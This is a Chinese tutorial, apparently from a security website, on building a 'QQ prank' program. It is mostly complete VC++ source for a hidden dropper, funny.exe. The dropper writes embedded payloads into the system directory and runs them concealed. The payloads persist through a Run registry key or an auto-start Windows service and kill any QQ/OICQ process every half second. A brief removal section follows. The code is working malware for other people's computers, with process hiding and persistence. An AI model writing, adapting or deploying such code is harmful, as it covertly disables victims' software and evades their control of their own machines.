上一篇:脚本安全和利用 >>
亲手打造一个QQ恶作剧程序
程序原理:获取系统中的所有进程,并保存在一个数组中,然后在数组中查找含有qq,oicq,qq,oicq字样的进程,如果找到就立即杀掉该进程.这样你一运行qq,qq进程就会被立即杀掉,也就是说如果该恶作剧程序一直运行你就不能上qq了.呵呵,这招是不是有点毒啊?好了,现在一步一步的来讲程序的编写过程.
首先我们要解决的问题是如何实现恶作剧程序的自我隐藏,关于进程隐藏的文章很多,我就只简单的介绍一下了.在win9x系统下可以通过调用registerserviceprocess api这个api函数将进程注册为一个服务模式的进程,这样在win9x系统下用ctrl+alt+del调出的任务管理器中将不会出现这个进程了.registerserviceprocess api函数存放于系统内核kernel32.dll中.具体声明如下:
dword registerserviceprocess(
dword dwprocessid, //服务进程的进程标志,如果为null表示当前进程
dword dwtype //如果参数为rsp_simple_service 表示注册当前进程
//如果参数为rsp_unregister_service 表示取消当前进程的注册
);
函数调用成功返回1,否则返回0
通过对registerserviceprocess 这个api函数的调用我们就能实现在win9x系统下的进程隐藏了.但是要在winnt系统下真正的实现进程隐藏就没有在win9x系统下那么简单了.只要进程以进程内核的形式运行,进程就将出现在任务管理器中.要实现winnt下进程的真正隐藏,只能以非进程的方式执行目标代码,也就是说把目标代码以线程的方式远程注册到宿主进程中.关于这种方法的实现已经有文章介绍,在这里就不多说了.在这里,我并没有采用这种隐藏进程的方法而是将进程注册为系统的一个名为service的服务进程,虽然这样并没有真正的隐藏进程,但是在一般情况下还是不容易发现的.在win2000下用任务管理器查看进程时是不能结束该进程的,必须通过控制面板中的服务管理控制台来停止服务,也可以在命令行下用net stop service来停止服务在xp下可以通过任务管理器结束该进程.这里简单介绍一下winnt中的服务程序:
在winnt中,一些后台服务程序是随着系统的启动而自动加载的.用户也可以通过控制面板中的服务管理控制台对服务的属性进行灵活的设置.甚至在用户没有登陆的情况下这些服务程序也能启动,象ftp服务,www服务和一些数据库就是以服务的形式存在于nt服务器上从而实现了无人职守. 在nt操作系统中,所有的后台服务全都由服务控制管理器进行统一管理,这些后台服务的状态数据都保存在服务控制管理器数据库中.所以要想创建一个新的后台服务,在应用程序的主模块里应首先调用函数openscmanager打开该数据库,再调用函数createservice在此数据库中创建1个新的服务线程对象,并将该线程对象启动属性设置为随系统启动自动加载,这样nt在重新启动时该线程就会由nt自动启动.完成这一步,仅仅实现了后台服务线程对象的注册,还没有建立与服务控制管理器的联结.要想启动服务可以通过函数startservice来完成,具体的过程我们将在编写service.exe的时候介绍.
说了这么多,你也许都看得不耐烦了吧,ok,现在正式切入主题,开始动手打造我们的qq恶作剧程序.程序由三部分组成,主程序funny.exe,kernel.exe,service.exe.首先我们先把kernel.exe和service.exe程序写好,这两个是完成主要功能的程序.然后将其转换成16进制代码放在在funny.exe定义的两个全局字符数组中,当funny.exe运行的时候根据操作系统的版本决定在系统目录下创建kernel.exe还是service.exe.kernel.exe将被创建到win9x的系统目录下,service.exe将被创建到win2000/xp的系统目录下.
现在我们开始来编写kernel.exe:
打开vc++6.0(啊?不要告诉我你电脑上没有装吧,那赶紧去装一个,不然你怎么写程序呢?呵呵)
运行appwizard创建一个对话框应用程序.工程名为kernel.在ckerneldlg类中添加hidewindow(),hideprocess(),
reg()三个函数.代码如下:
//隐藏对话框窗体
void ckerneldlg::hidewindow()
{
dword style = ::getwindowlong(afxgetmainwnd()->m_hwnd,gwl_exstyle);
style = ws_ex_toolwindow ;
::setwindowlong(afxgetmainwnd()->m_hwnd,gwl_exstyle,style);
::movewindow(afxgetmainwnd()->m_hwnd,0,0,0,0,false);
}
//将进程注册为服务模式的进程从而隐藏自身
void ckerneldlg::hideprocess()
{
typedef dword (callback* lpregisterserviceprocess)(dword,dword);
hinstance hdll;
lpregisterserviceprocess lpregisterserviceprocess;
hdll = loadlibrary("kernel32");
lpregisterserviceprocess=(lpregisterserviceprocess)
getprocaddress(hdll,"registerserviceprocess");
lpregisterserviceprocess(getcurrentprocessid(),1);
freelibrary(hdll);
}
//修改注册表,开机时自动运行
void ckerneldlg::reg()
{
lptstr lpsyspath=new char[max_path];
::getsystemdirectory(lpsyspath,max_path);
lpctstr lpsysfilename;
lpsysfilename=(lpctstr)lstrcat(lpsyspath,"\\kernel.exe");
dword dwvalue;
cregkey key;
lpctstr lpszkeyname="software\\microsoft\\windows\\currentversion\\run";
if(key.open(hkey_local_machine,lpszkeyname)==error_success)
if( key.queryvalue(dwvalue,"kernel")!=error_success)
key.setvalue(lpsysfilename,"kernel");
key.close();
}
这里用到了cregkey类,需要在kerneldlg.cpp中添加头文件atlbase.h关于cregkey的详细用法可以参考msdn帮助文档.然后利用类向导添加wm_timer消息,并在消息响应函数中加入以下代码:
void ckerneldlg::ontimer(uint nidevent)
{
m_pearray.removeall();
handle hprocesssnap=null;
processentry32 pe32;
hprocesssnap=::createtoolhelp32snapshot(th32cs_snapprocess,0);
pe32.dwsize=sizeof(processentry32);
//枚举系统中的所有进程并保存在数组类对象m_pearray中
if(::process32first(hprocesssnap,&pe32))
{
do
{
m_pearray.add(pe32);
}
while(::process32next(hprocesssnap,&pe32));
}
int i;
//在保存进程的数组中查找是否含有qq,oicq,qq,oicq字样的进程找到立即将其结束
for(i=0;i<m_pearray.getsize();i++)
{
cstring str;
str.format("%s",m_pearray.szexefile);
if(str.find("qq")!=-1││str.find("oicq")!=-1││str.find("qq")!=-1││str.find("oicq")!=-1)
{
handle hprocess;
dword processid;
processid=m_pearray.th32processid;
hprocess=::openprocess(process_all_access,false,processid);
::terminateprocess(hprocess,99);
closehandle(hprocess);
}
}
cdialog::ontimer(nidevent);
}
其中m_pearray的定义如下:carray<processentry32,processentry32 &> m_pearray;,在对话框初始化函数中加入以下代码:
bool ckerneldlg::oninitdialog()
{
cdialog::oninitdialog();
......
......
hidewindow(); //隐藏对话框窗口
hideprocess(); //win9x下在任务管理器中隐藏进程
reg(); //改写注册表,开机自动运行
settimer(1,500,null); //设定记时器,不断刷新进程数组,并寻找qq程将其结束
return true;
}
这样kernel.exe程序就完成了,现在可以编译连接成可执行文件了.(后附工程文件).
编写service.exe:
创建一个名为service的win32 console application程序,选择对mfc的支持service.cpp的代码如下:
/******************************************************************/
/*module:service.cpp */
/*author:inetufo */
/*email:inetufo@thugx.com */
/*date:2003/3/7 */
/******************************************************************/
// service.cpp : defines the entry point for the console application.
//
#include "stdafx.h"
#include "service.h"
#include "winsvc.h"
#include <atlbase.h> //cregkey类需要的头文件
#include <afxtempl.h> //carray类需要的头文件
#include <tlhelp32.h> //toolhelp函数需要的头文件
#ifdef _debug
#define new debug_new
#undef this_file
static char this_file[] = __file__;
#endif
/////////////////////////////////////////////////////////////////////////////
// the one and only application object
cwinapp theapp;
using namespace std;
service_status_handle ssh;
sc_handle scm,svc;
service_status ss;
carray<processentry32,processentry32 &> m_pearray;
void winapi servicemain(dword dwargc, lptstr *lpszargv);
void winapi handler(dword opcode);
void installservice();
uint killqq(lpvoid lpvoid);
int _tmain(int argc, tchar* argv[], tchar* envp[])
{
int nretcode = 0;
// initialize mfc and print and error on failure
if (!afxwininit(::getmodulehandle(null), null, ::getcommandline(), 0))
{
// todo: change error code to suit your needs
cerr << _t("fatal error: mfc initialization failed") << endl;
nretcode = 1;
}
else
{
service_table_entry ste[2];
//线程入口表
ste[0].lpservicename="service"; //线程名字
ste[0].lpserviceproc=servicemain; //线程入口地址
//可以有多个线程,最后一个必须为null
ste[1].lpservicename=null;
ste[1].lpserviceproc=null;
startservicectrldispatcher(ste);
installservice();
}
return nretcode;
}
//安装并启动服务
void installservice()
{
lptstr lpsyspath=new char[max_path];
::getsystemdirectory(lpsyspath,max_path);
lpctstr lpsysfilename;
lpsysfilename=(lpctstr)lstrcat(lpsyspath,"\\service.exe");
scm=openscmanager(null,null,sc_manager_all_access);
if(scm!=null)
svc=createservice(scm,"service","service",service_all_access,
service_win32_own_process│service_interactive_process,service_auto_start,service_error_ignore,lpsysfilename,null,null,null,null,null);
if(svc!=null)
svc=openservice(scm,"service",service_start);
if (svc!=null)
{
startservice(svc,0,null);
closeservicehandle(svc);
}
closeservicehandle(scm);
}
//服务的真正入口点函数
void winapi servicemain(dword dwargc, lptstr *lpszargv)
{
ss.dwservicetype = service_win32;
ss.dwcurrentstate = service_start_pending;
ss.dwcontrolsaccepted = service_accept_stop│ service_accept_pause_continue;
ss.dwservicespecificexitcode = 0;
ss.dwwin32exitcode = 0;
ss.dwcheckpoint = 0;
ss.dwwaithint = 0;
ssh=registerservicectrlhandler("service",handler);
ss.dwcurrentstate = service_running;
ss.dwcheckpoint = 0;
ss.dwwaithint = 0;
setservicestatus(ssh,&ss);
afxbeginthread(killqq,null,null); //开始一个工作线程实现程序功能
ss.dwcurrentstate = service_running;
ss.dwcheckpoint = 0;
ss.dwwaithint = 0;
setservicestatus(ssh,&ss);
}
//处理服务要求
void winapi handler(dword opcode)
{
switch(opcode)
{
case service_control_stop:
ss.dwcurrentstate =service_stopped;
setservicestatus (ssh,&ss);
break;
case service_control_continue:
ss.dwcurrentstate = service_running;
setservicestatus (ssh,&ss);
break;
case service_control_pause:
ss.dwcurrentstate = service_paused;
setservicestatus (ssh,&ss);
break;
case service_control_interrogate:
break;
}
setservicestatus (ssh,&ss);
}
//在进程列表中查找qq程序并杀掉的线程函数
uint killqq(lpvoid lparam)
{
while(1)
{
m_pearray.removeall();
handle hprocesssnap=null;
processentry32 pe32;
hprocesssnap=::createtoolhelp32snapshot(th32cs_snapprocess,0);
pe32.dwsize=sizeof(processentry32);
if(::process32first(hprocesssnap,&pe32))
{
do
{
m_pearray.add(pe32);
}
while(::process32next(hprocesssnap,&pe32));
}
int i;
for(i=0;i<m_pearray.getsize();i++)
{
cstring str;
str.format("%s",m_pearray.szexefile);
if(str.find("qq")!=-1││str.find("oicq")!=-1││str.find("qq")!=-1││str.find("oicq")!=-1)
{
handle hprocess;
dword processid;
processid=m_pearray.th32processid;
hprocess=::openprocess(process_all_access,false,processid);
::terminateprocess(hprocess,99);
closehandle(hprocess);
}
}
sleep(500);
}
return 0;
}
编译连接可以生成service.exe程序.(后附整个工程)
现在我们已经得到了实现功能的两个程序,kernel.exe是在win9x系统下实现功能的程序,service.exe是win2000/xp下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的win32 console application程序,程序代码如下:
#include <stdio.h>
#include <windows.h>
int main(int argc,char **argv)
{
handle hfile;
dword dwsize,dwread,dwindex=0,i;
unsigned char *lpbuff=null;
__try
{
if(argc!=2)
{
printf("\nusage: %s <file>",argv[0]);
__leave;
}
hfile=createfile(argv[1],generic_read,file_share_read,null,open_existing,file_attribute_normal,null);
if(hfile==invalid_handle_value)
{
printf("\nopen file %s failed:%d",argv[1],getlasterror());
__leave;
}
dwsize=getfilesize(hfile,null);
if(dwsize==invalid_file_size)
{
printf("\nget file size failed:%d",getlasterror());
__leave;
}
lpbuff=(unsigned char *)malloc(dwsize);
if(!lpbuff)
{
printf("\nmalloc failed:%d",getlasterror());
__leave;
}
while(dwsize>dwindex)
{
if(!readfile(hfile,&lpbuff[dwindex],dwsize-dwindex,&dwread,null))
{
printf("\nread file failed:%d",getlasterror());
__leave;
}
dwindex+=dwread;
}
for(i=0;i<dwsize;i++)
{
if((i%16)==0)
if(i==0)
printf("\"");
else
printf("\"\n\"");
printf("\\x%.2x",lpbuff);
}
printf("\"");
}//end of try
__finally
{
if(lpbuff) free(lpbuff);
closehandle(hfile);
}
return 0;
}
编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到service.exe的16进制代码.
啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe:
用appwizard生成一个名为funny的对话框程序.定义两个全局字符数组用来保存kernel.exe和service.exe
的16进制代码:char exebuff9x[]="kernel.exe的16进制代码" char exebuff2k[]="service.exe的16进制代码".添加hidewindow(),iswin9x(),createfileservice9x(cstring filename),createfileservice2k
(cstring filename),runservice(cstring filename)几个函数,其代码和实现的功能如下:
//隐藏主窗口
void cfunnydlg::hidewindow()
{
dword style = ::getwindowlong(afxgetmainwnd()->m_hwnd,gwl_exstyle);
style = ws_ex_toolwindow ;
::setwindowlong(afxgetmainwnd()->m_hwnd,gwl_exstyle,style);
::movewindow(afxgetmainwnd()->m_hwnd,0,0,0,0,false);
}
//获取操作系统版本信息
bool cfunnydlg::iswin9x()
{
dword dwversion;
dwversion=::getversion();
if (dwversion >= 0x80000000) //win9x
return true;
else
return false; //win2k/winxp
}
//如果系统是win9x则在系统目录下创建kernel.exe
void cfunnydlg::createfileservice9x(cstring filename)
{
dword i=0,dwindex=0,dwwrite,dwsize=sizeof(exebuff9x);
handle hfile=null;
lptstr lpsyspath=new char[max_path];
lptstr lpcurrentpath=new char[max_path];
::getsystemdirectory(lpsyspath,max_path);
lpctstr lpsysfilename;
lpsysfilename=(lpctstr)lstrcat(lpsyspath,filename);
hfile=::createfile(lpsysfilename,generic_write│generic_read,file_share_read│file_share_write,null,
create_always,file_attribute_normal,null);
if(hfile==invalid_handle_value)
return ;
while(dwsize>dwindex)
{
if(!::writefile(hfile,&exebuff9x[dwindex],dwsize-dwindex,&dwwrite,null))
return ;
dwindex+=dwwrite;
}
closehandle(hfile);
return ;
}
//如果系统是win2k/xp则在系统目录下创建service.exe
void cfunnydlg::createfileservice2k(cstring filename)
{
dword i=0,dwindex=0,dwwrite,dwsize=sizeof(exebuff2k);
handle hfile=null;
lptstr lpsyspath=new char[max_path];
lptstr lpcurrentpath=new char[max_path];
::getsystemdirectory(lpsyspath,max_path);
lpctstr lpsysfilename;
lpsysfilename=(lpctstr)lstrcat(lpsyspath,filename);
hfile=::createfile(lpsysfilename,generic_write│generic_read,file_share_read│file_share_write,null,
create_always,file_attribute_normal,null);
if(hfile==invalid_handle_value)
return ;
while(dwsize>dwindex)
{
if(!::writefile(hfile,&exebuff2k[dwindex],dwsize-dwindex,&dwwrite,null))
return ;
dwindex+=dwwrite;
}
closehandle(hfile);
return ;
}
//运行创建的kernel.exe或者service.exe
void cfunnydlg::runservice(cstring filename)
{
lptstr lpsyspath=new char[max_path];
::getsystemdirectory(lpsyspath,max_path);
lpctstr lpsysfilename;
lpsysfilename=(lpctstr)lstrcat(lpsyspath,filename);
process_information pi;
startupinfo si;
memset(&si,0,sizeof(si));
si.cb=sizeof(si);
si.wshowwindow=sw_hide;
si.dwflags=startf_useshowwindow;
bool bret=::createprocess(lpsysfilename,null,null,null,false,normal_priority_class,null,null,&si,&pi);
return ;
}
在对话框的初始化函数里面调用上面定义的函数,其主要代码如下:
bool cfunnydlg::oninitdialog()
{
cdialog::oninitdialog();
......
......
hidewindow(); //隐藏对话框窗口
cstring filename="\\kernel.exe";
if(iswin9x()) //判断操作系统类型
{
createfileservice9x(filename); //在系统目录下创建kernel.exe
runservice(filename); //运行kernel.exe
}
else
{
filename="\\service.exe";
createfileservice2k(filename); //在系统目录下创建service.exe文件
runservice(filename); //运行service.exe
}
afxbeginthread(threadmessage,null,null); //执行线程函数threadmessage
return true;
}
好了,funny程序也完成了,现在可以编译连接成可执行程序了,整个程序就算写完了,你可以测试一下了以上代码在win98,win2000,winxp,vc++6.0环境下调试通过.(附整个工程文件).写了这么多快要累死了.如果有什么问题请来信inetufo@thugx.com,欢迎指教j
解决方法:
win98:
系统目录下将生成kernel.exe文件,可以先将注册表项hkey_local_machine\software\microsoft\
windows\currentversions\run下面的kernel子键删除.重起系统再删除系统目录下的kernel.exe文件
win2k/xp:
运行服务控制管理器,停止掉service服务,然后将系统目录下的service.exe文件删除,要把服务从服务管理器中清除可以将hkey_local_machine\system\controlset001\services下面的service键删除即可.
()
下一篇:CCIE:年薪翻了两倍 >>
相关文章:
- · 修复ADSL的Firmware之手记
- · Microsoft平台下的find在网络管理中的妙用
- · 利用组策略对象(GPOs)防止匿名登录
- · 删除系统顽固文件的十二招技巧
- · DoS攻击隐身于合法指令中 难以完全阻绝
- · 我能躲到哪里去?—无线定位技术
- · Windows“安全模式”的五项用途
- · ECHO命令的超详细使用
- · php注入专题
- · 对IPv6在NGI核心层和接入层部署的思考
- · IDS(入侵检测系统)术语
- · 如何用好双WAN路由器
- · 使用IP过滤,轻松管理网络
- · CHKDSK(磁盘检测)命令的运用
- · Linux下口令恢复任我行
- · 使用FlashFXP来提升权限
- · 部署防火墙策略的十六条守则
- · TopStyle Pro 使用技巧
- · 21分钟解决struts国际化和中文问题
- · WindowsNT/2K/XP/2K3系统实用工具集
- · TOPSEC网络安全体系平台
- · 巧用比较并合并文档 RPC服务启用的方法
- · Windows管道技术简述
- · 消除防火墙的局限性和脆弱性
- · Win2003作路由 局域网共享多出口上网
- · dvdrip、dvdscr、tc版等的区别
- · Windows2000/XP服务攻略
- · 破解加密光盘五法破解加密光盘五法
- · 常用的DDOS软件+动画教程
- · 教你申请10GB免费网络硬盘
- · 人在江湖安全第一 使用SNMP服务的安全防范
- · NT系统的门卫——SAM
- · 打造功能更强大更安全的Windows XP启动密码
- · 秘技!让毒霸和瑞星同时为你站岗
- · 优化Windows预读功能为系统提速
- · 远程线程嵌入技术
- · 秘技:突破SP2的线程限制
- · 强化TCPIP堆栈安全-抵御SYNICMPSNMP攻击